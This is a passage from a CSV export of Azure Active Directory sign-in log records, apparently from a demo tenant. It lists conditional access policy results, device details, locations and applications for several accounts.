'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e5856cfd-3e84-4d67-b30b-c1ce83660f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e5856cfd-3e84-4d67-b30b-c1ce83660f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1678,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:28.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8e3d50e-0502-4047-8840-3c2b1e49fa66,Microsoft.aadiam,Microsoft.aadiam,,Yoad Dvir,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'ded7275c-9276-4b54-8054-9b421c33c42b', 'browser': 'Chrome 80.0.3987', 'displayName': 'YODVIR-BOOK2', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",56b829a9-b00c-4327-92e2-045512e45300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yoad Dvir,71f0b003-5e79-4e8d-b085-ceeb8db6de3f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,56b829a9-b00c-4327-92e2-045512e45300,SigninLogs,Sucess,32.0840416,34.88776016
+1679,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:20.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,12e9a23b-f00d-4e38-8d05-4f59e903f50b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",82df5368-1a8b-4fb8-b076-b0df518b1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0df518b1000,SigninLogs,Sucess,36.6404686,-78.26995087
+1680,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:15.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,60ff24aa-d813-49fb-8fed-065e2fbdd692,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0184cc6e-10a2-4578-80c3-44b6d9920f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0184cc6e-10a2-4578-80c3-44b6d9920f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1681,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6d03335-dc54-49ab-bc5a-4a7bd9142dcf,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011b40391000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,aa57d52a-288e-488c-a4a9-011b40391000,SigninLogs,Sucess,50.6406517,5.572050095
+1682,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc572a62-c39e-4d1a-8c5a-fe66de197dd2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c0ce23b7-81fe-4875-94a5-4bf374151100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0ce23b7-81fe-4875-94a5-4bf374151100,SigninLogs,Sucess,36.6404686,-78.26995087
+1683,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,96652f45-845f-458a-bae7-186037ab10da,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",23877b62-2023-4ce4-9fb4-bf654bc80f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,23877b62-2023-4ce4-9fb4-bf654bc80f00,SigninLogs,Sucess,50.6406517,5.572050095
+1684,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,735ed2c2-d34c-4a00-b449-b5af2c29d962,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e4ad56a4-20cd-4ec9-8d5b-ecb8630a1000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e4ad56a4-20cd-4ec9-8d5b-ecb8630a1000,SigninLogs,Sucess,50.6406517,5.572050095
+1685,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,311f07c6-38c9-4e24-b2ea-9e6c078aafa0,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 